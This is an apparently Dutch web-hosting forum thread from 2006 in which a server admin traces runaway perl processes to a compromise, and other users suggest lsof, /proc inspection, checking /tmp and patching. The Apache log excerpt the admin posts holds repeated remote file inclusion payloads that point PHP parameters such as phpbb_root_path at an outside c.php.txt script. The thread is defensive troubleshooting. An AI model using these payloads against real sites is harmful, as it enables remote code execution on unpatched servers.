[perl] van wie?

**Keizer** · 06/12/06 14:31

hallo

hoe kom ik er achter welk perl bestand mijn server laat flippen?

Code:

 PID USER      PR  NI  VIRT  RES  SHR S %CPU %MEM    TIME+  COMMAND
13337 apache    25   0  8308 4736 1924 R 41.6  0.2  47:00.81 perl
10020 apache    25   0  8032 4392 1964 R 41.4  0.2 606:50.67 perl
25537 apache    15   0 52780  39m  10m S  6.1  2.0   0:02.80 httpd
 1142 apache    15   0 10320 6772 2008 S  1.8  0.3   0:11.99 perl
28089 apache    15   0 12628 8296 2896 S  1.5  0.4   0:11.55 perl
 9908 root      35  19  1768  564  204 R  1.3  0.0   0:13.90 gzip
30722 apache    15   0  9996 6580 2012 S  0.8  0.3   0:04.34 perl
 3006 apache    15   0 10436 7004 1996 S  0.8  0.3   0:09.11 perl
 3314 apache    15   0 10052 6632 1996 S  0.8  0.3   0:13.92 perl
28059 apache    15   0 12524 8228 2896 S  0.5  0.4   0:08.10 perl
21586 root      34  19  1768  524  204 R  0.5  0.0   0:03.90 gzip
  147 root      15   0     0    0    0 S  0.3  0.0  19:38.24 kswapd0
28067 apache    16   0 12908 8616 2900 S  0.3  0.4   0:06.75 perl
28082 apache    15   0 10084 6540 2000 S  0.3  0.3   0:08.81 perl
28225 apache    15   0 12824 8512 2880 S  0.3  0.4   0:06.06 perl
30743 apache    16   0  9992 6576 2012 S  0.3  0.3   0:25.95 perl
 3293 apache    15   0  9292 5764 1992 S  0.3  0.3   0:08.57 perl

zoals je ziet zijn er nogal wat perltjes open en dat vind me server niet zo lief (constante load 8)

alvast bedankt!

**wv-** · 06/12/06 15:00

Mogelijks ga je dit kunnen achterhalen met lsof |grep 13337 of via /proc/13337/environ.

**systemdeveloper** · 06/12/06 15:01

kijk eens wat 'lsof|grep perl' opleverd ?

(Of lsof|grep apache of oid)

**phreak** · 06/12/06 15:26

check de error log van je apache om te achterhalen waar de wgetjes naartoe gegaan zijn en kijk ook eens in /tmp.

**Keizer** · 06/12/06 15:54

dan komt er echt een te grote lijst met domeinen en log bestanden waar (deleted) achter staat... ik zal me apache log es checken

wat moet ik in me /tmp?

Code:

127.0.0.1 - - [06/Dec/2006:13:40:31 +0100] "GET /?basepath=http://domeintjeeee.nl/c.php.txt%3f HTTP/1.1" 500 - "-" "libwww-perl/5.79"
127.0.0.1 - - [06/Dec/2006:13:40:58 +0100] "GET /?textFile=http://domeintjeeee.nl/c.php.txt%3f HTTP/1.1" 500 - "-" "libwww-perl/5.79"
127.0.0.1 - - [06/Dec/2006:13:45:59 +0100] "GET /?textFile=http://domeintjeeee.nl/c.php.txt%3f HTTP/1.1" 500 - "-" "libwww-perl/5.79"
127.0.0.1 - - [06/Dec/2006:13:50:42 +0100] "GET /?basepath=http://domeintjeeee.nl/c.php.txt%3f HTTP/1.1" 500 - "-" "libwww-perl/5.79"
127.0.0.1 - - [06/Dec/2006:13:53:10 +0100] "GET /?vwar_root=http://domeintjeeee.nl/c.php.txt%3f HTTP/1.1" 500 - "-" "libwww-perl/5.79"
127.0.0.1 - - [06/Dec/2006:13:54:03 +0100] "GET /?basepath=http://domeintjeeee.nl/c.php.txt%3f HTTP/1.1" 500 - "-" "libwww-perl/5.79"
127.0.0.1 - - [06/Dec/2006:13:55:24 +0100] "GET /?textFile=http://domeintjeeee.nl/c.php.txt%3f HTTP/1.1" 500 - "-" "libwww-perl/5.79"
127.0.0.1 - - [06/Dec/2006:13:56:39 +0100] "GET /?basepath=http://domeintjeeee.nl/c.php.txt%3f HTTP/1.1" 500 - "-" "libwww-perl/5.79"
127.0.0.1 - - [06/Dec/2006:13:57:00 +0100] "GET /?vwar_root=http://domeintjeeee.nl/c.php.txt%3f HTTP/1.1" 500 - "-" "libwww-perl/5.79"
127.0.0.1 - - [06/Dec/2006:13:58:24 +0100] "GET /?vwar_root=http://domeintjeeee.nl/c.php.txt%3f HTTP/1.1" 500 - "-" "libwww-perl/5.79"
127.0.0.1 - - [06/Dec/2006:13:59:01 +0100] "GET /?textFile=http://domeintjeeee.nl/c.php.txt%3f HTTP/1.1" 500 - "-" "libwww-perl/5.79"
127.0.0.1 - - [06/Dec/2006:13:59:03 +0100] "GET /?basepath=http://domeintjeeee.nl/c.php.txt%3f HTTP/1.1" 500 - "-" "libwww-perl/5.79"
127.0.0.1 - - [06/Dec/2006:14:01:39 +0100] "GET /?phpbb_root_path=http://domeintjeeee.nl/c.php.txt%3f HTTP/1.1" 500 - "-" "libwww-perl/5.79"
127.0.0.1 - - [06/Dec/2006:14:01:41 +0100] "GET /?textFile=http://domeintjeeee.nl/c.php.txt%3f HTTP/1.1" 500 - "-" "libwww-perl/5.79"
127.0.0.1 - - [06/Dec/2006:14:03:14 +0100] "GET /?vwar_root=http://domeintjeeee.nl/c.php.txt%3f HTTP/1.1" 500 - "-" "libwww-perl/5.79"
127.0.0.1 - - [06/Dec/2006:14:03:58 +0100] "GET /?textFile=http://domeintjeeee.nl/c.php.txt%3f HTTP/1.1" 500 - "-" "libwww-perl/5.79"
127.0.0.1 - - [06/Dec/2006:14:04:32 +0100] "GET /?basepath=http://domeintjeeee.nl/c.php.txt%3f HTTP/1.1" 500 - "-" "libwww-perl/5.79"
127.0.0.1 - - [06/Dec/2006:14:08:03 +0100] "GET /?basepath=http://domeintjeeee.nl/c.php.txt%3f HTTP/1.1" 500 - "-" "libwww-perl/5.79"
127.0.0.1 - - [06/Dec/2006:14:09:06 +0100] "GET /?setmodules=pagestart&phpbb_root_path=http://domeintjeeee.nl/c.php.txt%3f HTTP/1.1" 500 - "-" "libwww-perl/5.79"
127.0.0.1 - - [06/Dec/2006:14:23:13 +0100] "GET /?phpbb_root_path=http://domeintjeeee.nl/c.php.txt%3f HTTP/1.1" 500 - "-" "libwww-perl/5.79"
127.0.0.1 - - [06/Dec/2006:14:27:22 +0100] "GET /?phpbb_root_path=http://domeintjeeee.nl/c.php.txt%3f HTTP/1.1" 500 - "-" "libwww-perl/5.79"
127.0.0.1 - - [06/Dec/2006:14:28:53 +0100] "GET /?thispath=http://domeintjeeee.nl/c.php.txt%3f HTTP/1.1" 500 - "-" "libwww-perl/5.79"
127.0.0.1 - - [06/Dec/2006:14:30:31 +0100] "GET /?phpbb_root_path=http://domeintjeeee.nl/c.php.txt%3f HTTP/1.1" 500 - "-" "libwww-perl/5.79"
127.0.0.1 - - [06/Dec/2006:14:33:14 +0100] "GET /?phpbb_root_path=http://domeintjeeee.nl/c.php.txt%3f HTTP/1.1" 500 - "-" "libwww-perl/5.79"
127.0.0.1 - - [06/Dec/2006:14:33:57 +0100] "GET /?phpbb_root_path=http://domeintjeeee.nl/c.php.txt%3f HTTP/1.1" 500 - "-" "libwww-perl/5.79"
127.0.0.1 - - [06/Dec/2006:14:37:28 +0100] "GET /? HTTP/1.1" 200 2675 "-" "libwww-perl/5.79"
127.0.0.1 - - [06/Dec/2006:14:37:51 +0100] "GET /?phpbb_root_path=http://domeintjeeee.nl/c.php.txt%3f HTTP/1.1" 500 - "-" "libwww-perl/5.79"
127.0.0.1 - - [06/Dec/2006:14:43:31 +0100] "GET /?thispath=http://domeintjeeee.nl/c.php.txt%3f HTTP/1.1" 500 - "-" "libwww-perl/5.79"
127.0.0.1 - - [06/Dec/2006:14:47:03 +0100] "GET /?phpbb_root_path=http://domeintjeeee.nl/c.php.txt%3f HTTP

hebben we een boosdoener?

update: "domeintjeeeee.nl" staat niet bij mij gehost, waarom roeptie een c.php.txt aan op die lokatie?

**phreak** · 06/12/06 16:11

omdat ie daar die file vandaan haalt..

**Keizer** · 06/12/06 16:17

ik vroeg 'wat' moet ik daar, ofwel wat moet ik doen om te checken

/me si teh b00n

**DiedX** · 06/12/06 22:38

Crisis vriend. Volgens mij heb je echt geen idee wat nu speelt.

Vermoedelijk ben je gehackt door een PHPbb / Joomla / Mambo / K#tscript, welke niet gepatched is. De "hack" vind je terug in /tmp of /var/tmp, en meer informatie vind je in /proc/<pid>

Ergo:

- Leer je klanten patchen

if (klant =0)
{
leer_patchen();
;

**systemdeveloper** · 06/12/06 22:59

Oorspronkelijk geplaatst door DiedX

Crisis vriend. Volgens mij heb je echt geen idee wat nu speelt.

Vermoedelijk ben je gehackt door een PHPbb / Joomla / Mambo / K#tscript, welke niet gepatched is. De "hack" vind je terug in /tmp of /var/tmp, en meer informatie vind je in /proc/<pid>

Ergo:

- Leer je klanten patchen

if (klant =0)
{
leer_patchen();
;

if (klant == 0){
leer_patchen();
}

/* Ik heb hem even ge-patched voor je */

**DiedX** · 06/12/06 23:14

GVD, ik wist dat het ergens de fout in ging

Thanks!

Wellicht was mijn post iets te hard naar TS toe, maar ik denk dat dit kennis is waar je je snel op in moet lezen. Ik heb de grote hints al gegeven. Lees, vergaar kennis, en zorg er voor dat je het lek boven hebt. Nu is het nog iets simpels, maar de volgende keer is het een rootkit, en sta je in RedBus backups terug te zetten (die maak je wel?)

**Keizer** · 07/12/06 14:16

we zijn nu 24 uur verder en de server draait weer als een zonnetje.. kheb op andere server wel es een deface gehad maar stonden gelukkig maar 20 domeinen op (en ja tuurlijk maak ik back-ups)

maar goed gelukkig ben ik niet de gene die er verstand van heeft dus het komt allemaal goed, thnx

Onderwerp Gereedschap

Toon

Onderwerp: [perl] van wie?

[perl] van wie?

Labels voor dit Bericht

Webhostingtalk.nl

Link met ons

Partners

Contact